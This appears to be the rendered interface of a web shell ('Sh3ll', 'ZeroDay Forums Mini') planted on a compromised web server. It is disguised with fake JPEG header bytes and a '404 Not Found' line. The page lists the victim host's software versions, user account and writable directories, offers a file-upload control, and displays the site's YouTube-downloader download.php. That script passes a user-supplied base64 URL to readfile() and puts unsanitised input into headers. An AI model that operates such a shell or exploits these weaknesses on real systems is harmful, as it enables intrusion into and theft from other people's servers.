ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/proxy/youtubedownload/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/proxy/youtubedownload/download.php
<?php
include_once('common.php');

// Check download token
if (empty($_GET['mime']) OR empty($_GET['token']))
{
	exit('Invalid download token 8{');
}

// Set operation params
$mime = filter_var($_GET['mime']);
$ext = str_replace(['/', 'x-'], '', strstr($mime, '/'));
$url = base64_decode(filter_var($_GET['token']));
$name = urldecode($_GET['title']) . '.' . $ext;

// Fetch and serve
if ($url)
{
	global $config;
	// prevent unauthorized download
	if($config->get('VideoLinkMode') === "direct" and !isset($_GET['getmp3']))
	{
		exit('VideoLinkMode: proxy download not enabled');
	}
	if($config->get('VideoLinkMode') !== "direct" and !isset($_GET['getmp3']) and !preg_match('@https://[^\.]+\.googlevideo.com/@', $url))
	{
		exit("unauthorized access (^_^)");
	}

	// check if request for mp3 download
	if(isset($_GET['getmp3']))
	{
		if($config->get('MP3Enable'))
		{
			$mp3_info = array();
			$mp3_info = \YoutubeDownloader\YoutubeDownloader::getDownloadMP3($url, $config);
			if(isset($mp3_info['mp3']))
			{
				$url = $mp3_info['mp3'];
			}
			else
			{
				if($config->get('debug') && isset($mp3_info['debugMessage']))
				{
					var_dump($mp3_info['debugMessage']);
				}
				exit($mp3_info['message']);
			}
		}
		else
		{
			exit("Option for MP3 download is not enabled.");
		}
	}


	if(isset($mp3_info['mp3']))
	{
		$size = filesize($mp3_info['mp3']);
	}
	else
	{
		$size = \YoutubeDownloader\YoutubeDownloader::get_size($url, $config);
	}

	// Generate the server headers
	header('Content-Type: "' . $mime . '"');
	header('Content-Disposition: attachment; filename="' . $name . '"');
	header("Content-Transfer-Encoding: binary");
	header('Expires: 0');
	header('Content-Length: '.$size);
	header('Pragma: no-cache');

	if (strpos($_SERVER['HTTP_USER_AGENT'], 'MSIE') !== FALSE)
	{
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Pragma: public');
	}

	readfile($url);
	exit;
}

// Not found
exit('File not found 8{');

ZeroDay Forums Mini